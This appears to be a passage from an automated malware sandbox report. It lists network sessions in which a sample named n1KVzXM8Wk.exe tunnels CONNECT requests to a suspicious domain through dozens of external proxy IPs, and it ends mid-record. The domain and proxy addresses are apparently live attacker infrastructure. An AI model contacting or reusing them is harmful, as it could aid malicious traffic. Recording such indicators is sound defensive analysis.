                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      223192.168.2.450543167.172.86.46104716812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.304378986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      224192.168.2.450559162.214.170.14469846812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.311929941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.771749020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.287362099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.365710974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.475071907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.680334091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.865911961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.975231886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.178369045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      225192.168.2.45056172.210.208.10141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.312338114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.756129980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      226192.168.2.450411212.3.112.128358606812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.335464954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      227192.168.2.45056624.249.199.441456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.356558084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      228192.168.2.450548116.199.170.1741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.359021902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      229192.168.2.45054761.7.183.15241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.369193077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      230192.168.2.450577104.16.207.86806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.372601986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.460566044 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      231192.168.2.450578172.67.53.215806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.379374981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.466761112 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      232192.168.2.45045072.210.252.13741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.415997982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      233192.168.2.45057498.170.57.23141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.844862938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      234192.168.2.45046927.65.116.24310806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.848563910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      235192.168.2.450571184.181.217.20141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.861061096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      236192.168.2.450583195.30.84.218340906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.861331940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      237192.168.2.450395103.37.82.134398736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.861429930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      238192.168.2.450585174.77.111.19641456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.861433029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      239192.168.2.450486141.94.174.6608706812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.861469984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      240192.168.2.450496192.169.226.96505786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.861583948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.865731001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.865938902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.865979910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.865765095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:54.865518093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      241192.168.2.450586157.185.161.100265896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.861638069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      242192.168.2.45049998.178.72.21109196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.861980915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      243192.168.2.45056827.75.152.19110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.863567114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      244192.168.2.45049045.233.2.141536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.863600969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.865840912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.865906954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.866034031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      245192.168.2.4505265.161.98.204379016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.863867044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.865761995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      246192.168.2.45051724.249.199.1241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.865262985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      247192.168.2.45045414.103.24.2080006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.889874935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      248192.168.2.45048761.247.25.23141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.890307903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      249192.168.2.449945199.102.105.24241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.904762030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      250192.168.2.450220103.230.126.123483596812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.921809912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      251192.168.2.449758107.180.101.1836636812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.935301065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.975018024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.975203037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.975507021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.974983931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:54.975619078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:06.977415085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      252192.168.2.44977078.47.35.3533126812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.937578917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.135298967 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      253192.168.2.450544184.178.172.13153116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.950102091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      254192.168.2.450043185.105.230.4531286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.968924046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.556143045 CET84INHTTP/1.0 200 Connection established
                                                                                                      Proxy-agent: Kerio Control/7.4.2 build 5136


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      255192.168.2.450557207.180.226.58646086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.986393929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.178044081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.178438902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.178740978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      256192.168.2.449792162.215.223.76626916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.989684105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.098587036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.147033930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.200637102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.266365051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.271842003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:07.271795034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      257192.168.2.449803207.180.234.220428236812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.989953995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.178164005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.178464890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.178741932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      258192.168.2.4502981.15.62.1256786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:18.994901896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.098592997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
